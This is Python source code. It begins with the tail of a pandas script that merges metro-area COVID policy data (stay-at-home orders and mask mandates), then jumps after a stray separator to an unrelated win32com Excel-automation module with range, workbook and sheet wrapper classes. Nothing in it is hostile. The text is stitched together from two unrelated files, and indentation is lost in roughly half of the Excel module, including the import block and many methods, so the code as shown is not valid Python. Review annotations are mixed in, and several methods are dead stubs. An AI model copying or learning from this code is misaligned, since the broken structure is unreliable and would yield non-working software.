    metro_state_df = metro_state_df.reset_index().merge(state_interventions, on='state').set_index(['metro-state', 'date'])
    metro_state_df = metro_state_df.groupby(['metro-state']).apply(fill_dummies, 'stay_at_home', 'start_stay_at_home', 'end_stay_at_home')
    metro_state_df = metro_state_df.groupby(['metro-state']).apply(fill_dummies, 'mask_mandate', 'mask_mandate_all')
    # add dummy to only include places once their outbreak has started - seems that 10 cases is the threshold used
    metro_state_df = start_outbreak_dummy(metro_state_df)
    # add dummies for metro areas
    metro_state_df = get_metro_dummies(metro_state_df)
    metro_state_df.to_csv(data/'metro_state_policy_evaluation.csv')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
import win32com.client as _win
import pywintypes as _pywintypes
except:
raise Exception()
import pandas as _pd
import os as _os
import datetime as _datetime
import pytz as _pytz
import numpy as _np
from copy import copy as _copy
from pyXL.excel_utils import _cr2a, _a2cr, _n2x, _x2n, _splitaddr, _df2outline, _isnumeric,_df_to_ll
class Rng:
"""
class which allows to manipulate excel ranges encapsulating applescript instructions
example:
x=XL.Excel() # this is just a reference to excel and allows to set a few settings, such as calculation etc.
wb=x.create_wb() # create a new workbook, returns instance of Workbook object
sh=wb.create_sheet('pippo') # create a new sheet named "pippo", returns instance of Sheet object
wb.sheets # return a list of sheets
sh2=wb.sheets[1] # get reference of sheet 1
r=sh.arng('B2') # access a range on the sheet
r #prints current "coordinates"
temp=TS.DataFrame(np.random.randn(30,4),columns=list('abcd'))
r.from_pandas(temp) #write data to current sheet
r #coordinates have changed!!
r.format_range({'b':'@','d':'0.0000'},{'c':40}) #do some formatting
r.sort('b') # do some sorting
r.to_pandas() #read data from current sheet
"""
def __repr__(self):
"""
print out coordinates of the range object
:return:
"""
return "Workbook: %s\tSheet: %s\tRange: %s" % (self.sheet.workbook.name, self.sheet.name, self.address)
def __init__(self, address=None, sheet=None, col=None, row=None):
"""
Initialize a range object from a given set of address, sheet name and workbook name
if any of these is not given, then they are fetched using "active" logic
:param address: range address, using A1 style (RC is not yet supported)
:param sheet: name of the sheet
:param workbook: name of the workbook
"""
self.range=None
self.sheet = None
self.address = None
if address is not None or col is not None or row is not None:
if address is not None:
self.address = address.replace('$', '').replace('"', '')
elif row is None and col is not None:
c = _n2x(col)
self.address = '%s:%s' % (c, c)
elif row is not None and col is None:
self.address = '%i:%i' % (row, row)
else:
self.address = '%s%i' % (_n2x(col), row)
if sheet is not None:
self.sheet = sheet
self._set_address()
def _set_address(self):
if self.sheet is None:
self.sheet = Sheet()
if self.address is None:
addr=self.sheet.ws.Selection.GetAddress(0, 0)
if self.address is None:
self.address = addr
if self.sheet is None:
self.sheet = Sheet(existing=self.sheet.ws)
self.range=self.sheet.ws.Range(self.address)
    def arng(self, address=None, row=None, col=None):
        """
        Quick access to a different range on the same sheet.
        :param address: A1-style address string
        :param row: 1-based row number
        :param col: 1-based column number
        :return: new Rng bound to this range's sheet
        """
        return Rng(address=address, sheet=self.sheet, row=row, col=col)
def offset(self, r=0, c=0):
"""
return new range object offset from the original by r rows and c columns
:param r: number of rows to offset by
:param c: number of columns to offset by
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2:
newaddr = _cr2a(coords[0] + c, coords[1] + r)
else:
newaddr = _cr2a(coords[0] + c, coords[1] + r, coords[2] + c, coords[3] + r)
return Rng(address=newaddr, sheet=self.sheet)
def iloc(self, r=0, c=0):
"""
return a cell in the range based on coordinates starting from left top cell
:param r: row index
:param c: columns index
:return:
"""
coords = _a2cr(self.address)
newaddr = _cr2a(coords[0] + c, coords[1] + r)
return Rng(address=newaddr, sheet=self.sheet)
def resize(self, r=0, c=0, abs=True):
"""
new range object with address with same top left coordinate but different size (see abs param)
:param r:
:param c:
:param abs: if true, then r and c determine the new size, otherwise they are added to current size
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2: coords = coords + coords
if abs:
newaddr = _cr2a(coords[0], coords[1], coords[0] + max(0, c - 1), coords[1] + max(0, r - 1))
else:
newaddr = _cr2a(coords[0], coords[1], max(coords[0], coords[2] + c), max(coords[1], coords[3] + r))
return Rng(address=newaddr, sheet=self.sheet)
def row(self, idx):
"""
range with given row of current range
:param idx: indexing is 1-based, negative indices start from last row
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2:
return _copy(self)
else:
newcoords = _copy(coords)
if idx < 0:
newcoords[1] = newcoords[3] + idx + 1
else:
newcoords[1] += idx - 1
newcoords[3] = newcoords[1]
newaddr = _cr2a(*newcoords)
return Rng(address=newaddr, sheet=self.sheet)
def column(self, idx):
"""
range with given col of current range
:param idx: indexing is 1-based, negative indices start from last col
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2:
return _copy(self)
else:
newcoords = _copy(coords)
if idx < 0:
newcoords[0] = newcoords[2] + idx + 1
else:
newcoords[0] += idx - 1
newcoords[2] = newcoords[0]
newaddr = _cr2a(*newcoords)
return Rng(address=newaddr, sheet=self.sheet)
def format(self, fmt=None, halignment=None, valignment=None, wrap_text=False):
"""
formats a range
if fmt is None, return current format
otherwise, you can also set alignment and wrap text
:param fmt: excel format string, look at U.FX for examples
:param halignment: right, left, center
:param valignment: top, middle, bottom
:param wrap_text: true or false
:return:
"""
if fmt is not None:
self.range.NumberFormat=fmt
elif halignment is not None:
pass
elif valignment is not None:
pass
elif wrap_text:
pass
else:
return self.range.NumberFormat
    def filldown(self):
        """
        Fill the content of the first row down into the rest of the selection
        (Excel Range.FillDown).
        :return:
        """
        self.range.FillDown()
    def color(self, col=None):
        """
        Color the range interior.
        :param col: RGB triplet, or None to remove coloring
            NOTE(review): relies on _rgb2xlcol(None) mapping to Excel's
            "no fill" value — confirm in the helper.
        :return:
        """
        self.range.Interior.Color = _rgb2xlcol(col)
def value(self, v=None):
    """
    Get or set the value of the range.

    With v=None the current cell value(s) are returned, with pywin32
    dates converted to datetime. Otherwise v is written to the range;
    the write path dispatches on the type of v:
      - numbers and strings are written as-is
      - date/datetime values are converted to pywin32 times first
      - pandas objects are delegated to from_pandas
      - lists/tuples/ndarrays are wrapped in a DataFrame and written
        without header or index

    :param v: value to be set, if None current value is returned
    :return: current value when reading; from_pandas' result when writing
        tabular data; otherwise None
    :raises Exception: for unhandled value types
    """
    if v is None:
        out = self.range.Value
        out=_parse_windates(out)
        return out
    else:
        if _isnumeric(v):
            self.range.Value = v
        elif isinstance(v, str):
            self.range.Value = v
        elif isinstance(v, (_datetime.date, _datetime.datetime)):
            self.range.Value = _dt2pywintime(v)
        elif isinstance(v, (_pd.DataFrame, _pd.Series)):
            return self.from_pandas(v)
        elif isinstance(v, (list, tuple, _np.ndarray)):
            temp = _pd.DataFrame(v)
            return self.from_pandas(temp, header=False, index=False)
        else:
            raise Exception('Unhandled datatype')
def get_array(self, string_value=False):
    """
    Get the range contents as a scalar or (nested) list.

    :param string_value: accepted for API compatibility but currently
        unused -- TODO confirm whether string conversion was intended
    :return: cell value(s), pywin32 dates converted to datetime

    NOTE(review): value() already runs _parse_windates, so the second
    call below is redundant (harmless -- the conversion leaves already
    converted values untouched).
    """
    val=self.value()
    val=_parse_windates(val)
    return val
def to_pandas(self, index=1, header=1):
    """
    Return the range as a pandas DataFrame.

    :param index: None for no index, otherwise an integer specifying the
        first n columns to use as index
    :param header: None to avoid using columns, otherwise the number of
        leading rows to use as a (multi-)column header
    :return: DataFrame
    :raises Exception: if header is not None and < 1
    """
    temp = self.get_array()
    # bug fix: `_pd.np` (the pandas.np alias) was deprecated in pandas
    # 0.25 and removed in 1.0+; use the numpy module imported by this
    # file (`_np`, already used elsewhere, e.g. in value()) instead.
    if header is None:
        temp = _pd.DataFrame(_np.array(temp))
    elif header == 1:
        hdr = temp[0]
        temp = _pd.DataFrame(_np.array(temp[header:]), columns=hdr)
    elif header > 1:
        hdr = _pd.MultiIndex.from_tuples(temp[:header])
        temp = _pd.DataFrame(_np.array(temp[header:]), columns=hdr)
    else:
        raise Exception()
    if index is not None:
        temp = temp.set_index(temp.columns.tolist()[:index])
    return temp
# def cell(self, value=None, formula=None, format=None, asarray=False):
# """
# get or set value, formula and format of a cell
#
# :param value:
# :param formula:
# :param format:
# :param asarray: specify if formula should be of array type
# :return:
# """
# if value is not None:
# self.value(value)
# if formula is not None:
# self.formula(formula,asarray=asarray)
# if format is not None:
# self.format(format)
#
# if value is None and formula is None and format is None:
# return self.value(), self.range.StringValue, self.formula(), self.format()
def formula(self, f=None, asarray=False):
    """
    Read or write the formula of the range.

    :param f: formula string to write; when None the current formula is returned
    :param asarray: write as an array (CSE) formula
    :return: the current formula when f is None, else None
    """
    if f is None:
        return self.range.Formula
    if asarray:
        self.range.FormulaArray = f
    else:
        self.range.Formula = f
def get_selection(self):
    """
    Refresh this range's coordinates from the current Excel selection.

    NOTE: this mutates the current instance (address and derived state)
    rather than returning a new Rng.

    :return: None
    """
    self.address = self.sheet.workbook.parent.app.Selection.GetAddress(0,0)
    self._set_address()
def get_cells(self):
    """
    TODO
    Return the addresses (relative A1 style) of every cell in the range.

    :return: list of address strings
    """
    temp = self.range.Cells()
    return [x.GetAddress(0,0) for x in temp]
def from_pandas(self, pdobj, header=True, index=True, index_label=None, outline_string=None):
    """
    Write a pandas object to Excel, anchored at this range's top-left cell.

    Side effect: self.address and self.range are re-pointed at the block
    actually written, so this Rng instance tracks the written data.

    :param pdobj: any DataFrame or Series object
    :param header: if False, strip header
    :param index: if False, strip index
    :param index_label: index header (currently unused in this body --
        TODO confirm whether it should be forwarded to _df_to_ll)
    :param outline_string: a string used to identify outline main levels (eg " All")
    :return: the list-of-lists that was written
    """
    temp = _df_to_ll(pdobj,header=header, index=index)
    temp = _fix_4_win(temp)  # convert dates to pywin32 times before writing
    trange = self.resize(len(temp), len(temp[0]))
    trange.range.Value=temp
    # re-anchor self on the written block
    self.address = trange.address
    self.range = self.sheet.ws.Range(self.address)
    if outline_string is not None:
        boundaries = _df2outline(pdobj, outline_string)
        self.outline(boundaries)
    return temp
def clear_formats(self):
    """
    Clear all formatting from the range (cell values are kept).

    :return: None
    """
    self.range.ClearFormats()
def delete(self, r=None, c=None):
    """
    Delete entire rows or columns intersecting the range.

    :param r: a row index or list of row indices (1-based, range-relative)
    :param c: a column index or list of column indices (1-based, range-relative)
    :return: None
    """
    assert (r is None) ^ (c is None), "Either r or c must be specified, not both!"
    if r is not None:
        if not isinstance(r, (tuple, list)): r = [r]
        # delete bottom-up so earlier deletions do not shift the indices
        # of rows still waiting to be deleted
        for rr in sorted(r, reverse=True):
            self.iloc(r=rr).EntireRow.Delete(Shift=_pywintypes.xlUp)
    if c is not None:
        if not isinstance(c, (tuple, list)): c = [c]
        # right-to-left for the same reason
        for cc in sorted(c, reverse=True):
            # bug fix: the Excel property is EntireColumn, not EntireCol
            self.iloc(c=cc).EntireColumn.Delete(Shift=_pywintypes.xlLeft)
    # NOTE(review): xlUp/xlLeft are looked up on _pywintypes here (and in
    # insert()); Excel shift constants normally live in win32com constants
    # (xlShiftUp / xlShiftToLeft) -- verify these resolve at runtime.
def insert(self, r=None, c=None):
    """
    Insert rows or columns -- CURRENTLY DISABLED.

    The bare `return` below short-circuits the whole method, so the code
    after it never runs; apparently left in as a stub/TODO.

    :param r: a (list of) row(s)
    :param c: a (list of) column(s)
    :return: None
    """
    return
    # --- dead code below, kept for when the feature is re-enabled ---
    # NOTE(review): `EntireCol` should be `EntireColumn`, and the shift
    # constants looked up on _pywintypes look suspect -- fix before
    # re-enabling.
    assert (r is None) ^ (c is None), "Either r or c must be specified, not both!"
    if r is not None:
        if not isinstance(r, (tuple, list)): r = [r]
        for rr in r:
            self.iloc(r=rr).EntireRow.Insert(Shift=_pywintypes.xlDown)
    if c is not None:
        if not isinstance(c, (tuple, list)): c = [c]
        for rr in c:
            self.iloc(c=rr).EntireCol.Insert(Shift=_pywintypes.xlRight)
def clear_values(self):
    """
    Clear all values from the range (formatting is kept).

    :return: None
    """
    self.range.ClearContents()
def column_width(self, w):
    """
    Set the width of every column intersecting the range.

    :param w: width value passed straight to Excel's ColumnWidth
    :return: None
    """
    self.range.EntireColumn.ColumnWidth=w
def row_height(self, h):
    """
    Set the height of every row intersecting the range.

    :param h: height value passed straight to Excel's RowHeight
    :return: None
    """
    self.range.EntireRow.RowHeight=h
def curr_region(self):
    """
    Return a new range covering Excel's CurrentRegion (the contiguous
    data block surrounding this range).

    :return: new Rng object
    """
    temp=self.range.CurrentRegion.GetAddress(0,0)
    return Rng(address=temp, sheet=self.sheet)
def replace(self, val, repl_with, whole=False):
    """
    Within the range, replace occurrences of val with repl_with.

    :param val: value to be looked for
    :param repl_with: value to replace with
    :param whole: if True, match entire cell contents; else substrings
    :return: None
    """
    # bug fix: the keyword argument was misspelled `Replacemente`, which
    # does not match the COM Range.Replace signature (`Replacement`)
    self.range.Replace(What=val,
                       Replacement=repl_with,
                       LookAt=(_pywintypes.xlWhole if whole else _pywintypes.xlPart))
def sort(self, key1, order1=None, key2=None, order2=None, key3=None, order3=None, header=True):
    """
    TODO -- NOT IMPLEMENTED: the body is an empty stub.

    sort data in a range, for now works only if header==True
    keys must be column header labels
    :param key1: header string
    :param order1: d/a
    :param key2:
    :param order2:
    :param key3:
    :param order3:
    :param header:
    :return: None
    """
    pass
def format_range(self, fmt_dict=None, cw_dict=None, columns=True):
    """
    Format multiple columns (or rows) at once.

    :param fmt_dict: dict where keys are column headers of the range
        (i.e. strings in the first row) and values are excel formatting
        codes; keys may also be regular expressions matched against the
        header names (e.g. `.*` works as a wildcard)
    :param cw_dict: like fmt_dict, but values are column widths
        (row heights when columns is False)
    :param columns: if True iterate over columns, else over rows
    :return: None
    """
    import re
    # best practice: avoid mutable default arguments
    fmt_dict = fmt_dict or {}
    cw_dict = cw_dict or {}
    if columns:
        names = self.range.Rows[1].Value[0]
    else:
        names = list(zip(*self.range.Columns[1].Value))[0]
    # bug fix: the old code used names.index(nm), so duplicate header
    # labels all resolved to the FIRST occurrence; enumerate fixes that.
    # Empty header cells (None) are skipped instead of crashing re.search.
    for pattern, fmt in fmt_dict.items():
        matcher = re.compile(pattern)
        for idx, nm in enumerate(names, start=1):
            if nm is not None and matcher.search(nm) is not None:
                if columns:
                    self.range.Columns[idx].NumberFormat = fmt
                else:
                    self.range.Rows[idx].NumberFormat = fmt
    for pattern, width in cw_dict.items():
        matcher = re.compile(pattern)
        for idx, nm in enumerate(names, start=1):
            if nm is not None and matcher.search(nm) is not None:
                if columns:
                    self.range.Columns[idx].ColumnWidth = width
                else:
                    self.range.Rows[idx].RowHeight = width
def freeze_panes(self):
    """
    Freeze panes at the upper-left cell of the range.

    :return: None
    """
    self.range.Select()
    # bug fix: Workbook instances have no `app` attribute (see
    # Workbook.__init__); the Excel Application object is reached via
    # workbook.parent, exactly as get_selection() does
    self.sheet.workbook.parent.app.ActiveWindow.FreezePanes = True
def color_scale(self, vmin=5, vmed=50, vmax=95, cv=5):
    """
    TODO -- DISABLED: the bare `return` below short-circuits the method.
    The code after it appears to be leftover AppleScript/XLM automation
    (note `_asrun`) and never executes.

    apply 3 color scale formatting
    :param vmin: minimum value
    :param vmed: median value
    :param vmax: maximum value
    :param cv: a number that determines what "value" in the previous params is, from the following list
        5 Percentile is used. (default)
        7 The longest data bar is proportional to the maximum value in the range.
        6 The shortest data bar is proportional to the minimum value in the range.
        4 Formula is used.
        2 Highest value from the list of values.
        1 Lowest value from the list of values.
        -1 No conditional value.
        0 Number is used.
        3 Percentage is used.
    :return: None
    """
    return
    # --- dead code below, kept only as a reference for reimplementation ---
    self.select()
    macro = '"ColorScale" arg1 %f arg2 %f arg3 %f arg4 %i' % (vmin, vmed, vmax, cv)
    ascript = '''
    run XLM macro %s
    ''' % macro
    return _asrun(ascript)
def select(self):
    """
    Select the range in Excel.

    :return: None
    """
    self.range.Select()
def highlight(self, condition='==', threshold=0.0, interiorcolor=(255, 0, 0)):
    """
    TODO -- DISABLED: the bare `return` below short-circuits the method;
    the remainder appears to be leftover AppleScript automation
    (note `_asrun`) and never executes.

    highlight cells satisfying given condition
    :param condition: one of ==,!=,>,<,>=,<=
    :param threshold: a number
    :param interiorcolor: an RGB triple specifying the color, eg [255,0,0] is red
    :return: None
    """
    return
    # --- dead code below, reference only ---
    dest = self._build_dest()
    ascript = '''
    %s
    tell rng
    try
    delete (every format condition)
    end try
    set newFormatCondition to make new format condition at end with properties {format condition type: cell value, condition operator:operator %s, formula1:%f}
    set color of interior object of newFormatCondition to {%s}
    end tell
    '''
    cond = {'==': 'equal', '!=': 'not equal', '>': 'greater', '<': 'less', '>=': 'greater equal',
            '<=': 'less equal'}
    ascript = ascript % (dest, cond[condition], threshold, str(interiorcolor)[1:-1])
    return _asrun(ascript)
def col_dict(self):
    """
    For a range whose first row is a header, build a dict of per-column
    sub-ranges (the header row itself is excluded).

    :return: dict mapping header string -> Rng covering that column's data
    """
    headers = self.row(1).value()[0]
    c1, r1, c2, r2 = _a2cr(self.address)
    return {
        label: Rng(address=_cr2a(col, r1 + 1, col, r2), sheet=self.sheet)
        for label, col in zip(headers, range(c1, c2 + 1))
    }
def autofit_rows(self):
    """
    Autofit the height of every row intersecting the range.

    :return: None
    """
    self.range.EntireRow.AutoFit()
def autofit_cols(self):
    """
    Autofit the width of every column intersecting the range.

    :return: None
    """
    self.range.EntireColumn.AutoFit()
def entire_row(self):
    """
    Return a range spanning the entire worksheet row(s) of this range.

    :return: new Rng object
    """
    coords = _a2cr(self.address)
    if len(coords) == 2:
        # single cell: duplicate into a degenerate 4-tuple
        coords = coords + coords
    addr = '%s:%s' % (coords[1], coords[3])
    return Rng(address=addr, sheet=self.sheet)
def entire_col(self):
    """
    Return a range spanning the entire worksheet column(s) of this range.
    (The old docstring said "row(s)" -- a copy/paste slip.)

    :return: new Rng object
    """
    coords = _a2cr(self.address)
    if len(coords) == 2:
        # single cell: duplicate into a degenerate 4-tuple
        coords = coords + coords
    addr = '%s:%s' % (_n2x(coords[0]), _n2x(coords[2]))
    return Rng(address=addr, sheet=self.sheet)
def activate(self):
    """
    Activate the owning worksheet, then the range itself.

    :return: None
    """
    self.sheet.ws.Activate()
    self.range.Activate()
def propagate_format(self, col=True):
    """
    TODO -- NOT IMPLEMENTED: the method returns immediately.

    propagate formatting of first column (row) to subsequent columns (rows)
    :param col: True for columns, False for rows
    :return: None
    """
    return
def font_format(self, bold=False, italic=False, name='Calibri', size=12, color=(0, 0, 0)):
    """
    Set font properties of the range.

    :param bold: true/false
    :param italic: true/false
    :param name: a font name, such as Calibri or Courier
    :param size: number
    :param color: RGB triplet
    :return: None (the previous docstring claimed a list of current font
        properties is returned, but nothing is)
    """
    self.range.Font.Bold = bold
    self.range.Font.Italic = italic
    self.range.Font.Name = name
    self.range.Font.Size = size
    self.range.Font.Color = _rgb2xlcol(color)
def outline(self, boundaries):
    """
    Group rows as defined by the boundaries mapping.

    :param boundaries: dict mapping a group's "main level" row offset to a
        [first, last] pair of sub-row offsets belonging to that level
    :return: None
    """
    # show summary rows above their detail rows
    self.sheet.ws.Outline.SummaryRow = 0
    for k, [f, l] in boundaries.items():
        # group the detail rows of this level...
        r = self.offset(r=f).resize(r=l - f + 1).entire_row()
        r.range.Group()
        # ...and bold the main-level row itself
        r = self.offset(r=k).row(1)
        r.range.Font.Bold=True
def show_levels(self, n=2):
    """
    Set the outline level to display on the owning sheet.

    :param n: number of row levels to show
    :return: None
    """
    self.sheet.ws.Outline.ShowLevels(RowLevels=n)
def goal_seek(self, target, r_mod):
    """
    TODO -- DISABLED: the bare `return` below short-circuits the method;
    the remainder appears to be leftover AppleScript automation
    (note `_asrun`) and never executes.

    set value of range of self to target by changing range r_mod
    :param target: the target value for current range
    :param r_mod: the range to modify, or an integer with the column offset from the current cell
    :return: None
    """
    return
    # --- dead code below, reference only ---
    dest = self._build_dest()
    if isinstance(r_mod, int):
        dest2 = self.offset(0, r_mod)._build_dest('rng2')
    else:
        dest2 = self.arng(r_mod)._build_dest('rng2')
    ascript = """
    %s
    %s
    goal seek rng goal %f changing cell rng2
    """ % (dest, dest2, target)
    return _asrun(ascript)
def paste_fig(self, figpath, w, h):
    """
    Paste a picture from a file onto the sheet, anchored at the top-left
    corner of the current range.

    :param figpath: path of the image file
    :param w: width in pixels
    :param h: height in pixels
    :return: None
    """
    obj1 = self.sheet.ws.Pictures().Insert(figpath)
    #obj1.ShapeRange.LockAspectRatio = _pywintypes.msoTrue
    obj1.Left = self.range.Left
    obj1.Top = self.range.Top
    obj1.ShapeRange.Width = w
    obj1.ShapeRange.Height = h
    #obj1.Placement = 1
    #obj1.PrintObject = True
def subrng(self, t, l, nr=1, nc=1):
    """
    Return a sub-range located relative to this range's top-left corner.

    :param t: row offset from the current top row
    :param l: column offset from the current leftmost column
    :param nr: number of rows in the subrange
    :param nc: number of columns in the subrange
    :return: new Rng object
    """
    coords = _a2cr(self.address)
    left, top = coords[0] + l, coords[1] + t
    addr = _cr2a(left, top, left + nc - 1, top + nr - 1)
    return Rng(address=addr, sheet=self.sheet)
def subtotal(self, groupby, totals, aggfunc='sum'):
    """
    TODO -- DISABLED: the bare `return` below short-circuits the method;
    the remainder appears to be leftover AppleScript automation
    (note `_asrun`) and never executes.

    :param groupby: header label of the grouping column
    :param totals: header labels of the columns to aggregate
    :param aggfunc: aggregation name (see `funcs` in the dead code)
    :return: None
    """
    return
    # --- dead code below, reference only ---
    funcs = ['sum', 'count', 'average', 'maximum', 'minimum', 'product', 'standard deviation']
    assert aggfunc in funcs, "aggfunc must be in " + str(funcs)
    dest = self._build_dest()
    ascript = '''
    %s
    set r1 to value of row 1 of rng
    return my flatten(r1)
    ''' % dest
    names = _parse_aslist(_asrun(ascript))
    igroupby = names.index(groupby) + 1
    itotals = [str(names.index(t) + 1) for t in totals]
    ascript = '''
    %s
    subtotal rng group by %i function do %s total list {%s} summary below data summary above
    ''' % (dest, igroupby, aggfunc, ','.join(itotals))
    return _asrun(ascript)
def size(self):
    """
    Return the dimensions of the range.

    :return: (number of columns, number of rows)
    """
    coords = _a2cr(self.address)
    width = coords[2] - coords[0] + 1
    height = coords[3] - coords[1] + 1
    return width, height
class Excel():
    """
    Basic wrapper of the Excel application, providing some methods to
    perform simple automation, such as creating/opening/closing workbooks.
    """
    def __repr__(self):
        """Short status string for interactive use."""
        return 'Excel application, currently %i workbooks are open' % len(self.workbooks)

    def __init__(self):
        # attach to (or start) Excel through the generated COM wrappers
        self.app = _win.gencache.EnsureDispatch('Excel.Application')
        self.app.Visible = True
        self.workbooks = []              # Workbook wrappers, kept in sync manually
        self._calculation_manual = False
        self.refresh_workbook_list()

    def refresh_workbook_list(self):
        """
        Re-sync self.workbooks with the workbooks currently open in Excel.

        Call this if, during an interactive session, the user creates or
        deletes workbooks manually -- this object cannot observe that.

        :return: None
        """
        self.workbooks = []
        for wb in self.app.Workbooks:
            # the Workbook constructor appends itself to self.workbooks
            Workbook(existing=wb, parent=self, name=wb.Name)

    def active_workbook(self):
        """
        Return a wrapper for the currently active workbook.

        :raises Exception: if no workbook is currently open
        """
        try:
            wb = self.app.ActiveWorkbook
            return Workbook(existing=wb, parent=self, name=wb.Name)
        except Exception:
            # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit escape
            raise Exception('no workbook currently open')

    def active_range(self):
        """
        Return a Rng wrapper for the current Excel selection.

        :raises Exception: if no workbook is currently open
        """
        try:
            wb = self.app.ActiveWorkbook
            ws = self.app.ActiveSheet
            r = self.app.Selection
            wbo = self.get_wb(wb.Name)
            wso = wbo.get_sheet(ws.Name)
            return Rng(address=r.GetAddress(0, 0), sheet=wso)
        except Exception:
            raise Exception('no workbook currently open')

    def create_wb(self, name='Workbook.xlsx'):
        """
        Create a new workbook.

        NOTE(review): `name` is currently ignored -- confirm whether it
        should be forwarded to the Workbook constructor.

        :return: new Workbook wrapper
        """
        return Workbook(parent=self)

    def get_wb(self, name):
        """
        Get a workbook wrapper by name.

        :param name: workbook name as shown by Excel
        :raises Exception: if no workbook with that name is tracked
        """
        # bug fix: the old linear search silently returned the LAST
        # workbook when the name was not found (its `i > len(...)` guard
        # could never trigger); now a missing name raises as intended
        for wb in self.workbooks:
            if wb.name == name:
                return wb
        raise Exception("there is no workbook %s" % name)

    def calculation(self, manual=True):
        """
        Switch Excel calculation between manual and automatic.

        :param manual: True for manual calculation
        :return: None
        """
        self.app.Calculation = _win.constants.xlManual if manual else _win.constants.xlAutomatic
        # keep the cached flag consistent with what we just set
        self._calculation_manual = manual

    def open_wb(self, fpath):
        """
        Open a workbook from a file path.

        :param fpath: full path of the workbook file
        :return: Workbook wrapper
        """
        wb = Workbook(existing=self.app.Workbooks.Open(fpath), parent=self)
        wb.refresh_sheet_list()
        return wb
class Workbook():
    """
    An object representing an Excel workbook, providing a few methods to
    automate it.
    """
    def __repr__(self):
        """Short status string for interactive use."""
        return "Workbook object '%s', has %i sheets" % (self.name, len(self.sheets))

    def __init__(self, existing=None, parent=None, name=None):
        """
        Wrap an existing COM workbook or create a new one.

        :param existing: existing COM workbook object to wrap, or None to
            create a fresh workbook
        :param parent: owning Excel wrapper; a new one is created if None
        :param name: name for a newly created workbook (ignored when
            wrapping an existing one)
        """
        self.wb = None
        self.name = None
        self.parent = None
        self.sheets = []
        self.existing_wb = existing   # None means "created by us, never saved"
        if parent is not None:
            self.parent = parent
        elif self.parent is None:
            self.parent = Excel()
        if existing is None:
            wb = self.parent.app.Workbooks.Add()
            if name is not None:
                wb.Name = name
            self.wb = wb
            self.name = wb.Name
        else:
            self.wb = existing
            self.name = existing.Name
        self.refresh_sheet_list()
        self.parent.workbooks.append(self)

    def create_sheet(self, name='Sheet'):
        """
        Create a new sheet in this workbook.

        :param name: desired sheet name (deduplicated by the Sheet class)
        :return: new Sheet wrapper
        """
        return Sheet(name=name, workbook=self)

    def refresh_sheet_list(self):
        """
        Re-sync self.sheets with the sheets currently in this workbook.

        Call this if the user adds/removes sheets manually -- this object
        cannot observe that.

        :return: None
        """
        self.sheets = []
        # bug fix: iterate THIS workbook's worksheets; the old code used
        # self.parent.app.Worksheets, which refers to the *active*
        # workbook and could be a different one entirely
        for ws in self.wb.Worksheets:
            Sheet(existing=ws, workbook=self)   # appends itself to self.sheets

    def saveas(self, fpath):
        """
        Save the workbook into a different file
        (silently overwrites an existing file with the same name!!!).

        :param fpath: destination path
        :return: None
        """
        self.parent.app.DisplayAlerts = False
        try:
            self.wb.SaveAs(fpath)
        finally:
            # always restore alerts, even if SaveAs raises
            self.parent.app.DisplayAlerts = True
        self.name = _os.path.basename(fpath)

    def save(self, fpath=None):
        """
        Save the workbook; a workbook created by us (never saved) needs fpath.

        :param fpath: destination path, required for a brand-new workbook
        :raises ValueError: if a never-saved workbook is saved without fpath
        :return: None
        """
        if self.existing_wb is None:
            if fpath is None:
                raise ValueError('this workbook has never been saved; provide fpath')
            self.saveas(fpath=fpath)
        else:
            self.parent.app.DisplayAlerts = False
            try:
                self.wb.Save()
            finally:
                self.parent.app.DisplayAlerts = True

    def close(self):
        """Close the workbook without saving it."""
        self.wb.Close()
        self.parent.refresh_workbook_list()

    def get_sheet(self, name):
        """
        Get a sheet wrapper by name, or by 0-based position when an int
        is given (supports callers such as Sheet.copy_ws_to_wb that pass
        a positional index).

        :param name: sheet name string, or int index into self.sheets
        :raises Exception: if no matching sheet exists
        """
        if isinstance(name, int):
            try:
                return self.sheets[name]
            except IndexError:
                raise Exception("there is no sheet %s" % name)
        # bug fix: the old search silently returned the LAST sheet when
        # the name was missing (its index guard could never trigger)
        for sh in self.sheets:
            if sh.name == name:
                return sh
        raise Exception("there is no sheet %s" % name)
class Sheet():
    """
    An object representing an Excel worksheet, providing a few methods to
    automate it.
    """
    def __repr__(self):
        """Short status string for interactive use."""
        return "Worksheet object %s, owned by '%s'" % (self.name, self.workbook.name)

    def __init__(self, existing=None, workbook=None, name=None):
        """
        Wrap an existing worksheet or create a new one.

        :param existing: COM worksheet object to wrap, or None to create one
        :param workbook: owning Workbook wrapper; when None a new workbook
            is created and its first sheet is wrapped
        :param name: name for a newly created sheet (deduplicated by
            appending "(i)")
        """
        self.workbook = None
        self.ws = None          # the underlying COM worksheet object
        self.name = None
        self.rng = None         # last range accessed through arng()
        self.cell_data = {}     # per-address values (set_values_formulas_formats)
        self.cell_formats = {}  # per-address formats/formulas
        if workbook is None:
            self.workbook = Workbook(name='WB_' + name)
            # bug fix: this used to assign the first sheet's *name* (a
            # string) to `existing`, which then crashed below on `.Name`;
            # wrap the new workbook's first worksheet COM object instead
            existing = self.workbook.sheets[0].ws
        else:
            self.workbook = workbook
        if existing is None:
            ws = self.workbook.wb.Worksheets.Add()
            ws.Name = self._unique_name(name)
            self.ws = ws
            self.name = self.ws.Name
        else:
            self.ws = existing
            self.name = self.ws.Name
        self.rng = Rng('A1', sheet=self)
        self.workbook.sheets.append(self)

    def _unique_name(self, name):
        # append "(i)" until the candidate clashes with no existing sheet name
        taken = [sh.name for sh in self.workbook.sheets]
        uname = name
        i = 0
        while uname in taken:
            i += 1
            uname = name + '(%i)' % i
        return uname

    def arng(self, address=None, row=None, col=None):
        """
        Access a range on the sheet, providing either an address in A1
        format, or a row and/or a column.

        :param address: string in A1 format
        :param row: integer, 1-based
        :param col: integer, 1-based
        :return: Rng object (also stored on self.rng)
        """
        self.rng = Rng(address=address, row=row, col=col, sheet=self)
        return self.rng

    def rename(self, name):
        """
        Rename the sheet, deduplicating against existing sheet names.

        :param name: desired name
        :return: None
        """
        uname = self._unique_name(name)
        self.ws.Name = uname
        self.name = uname

    def unprotect(self):
        """Remove protection (only if no password!). TODO: not implemented."""
        pass

    def protect(self):
        """Activate protection (without password!). TODO: not implemented."""
        pass

    def delete_shapes(self):
        """Delete all shape objects on the sheet. TODO: not implemented."""
        pass

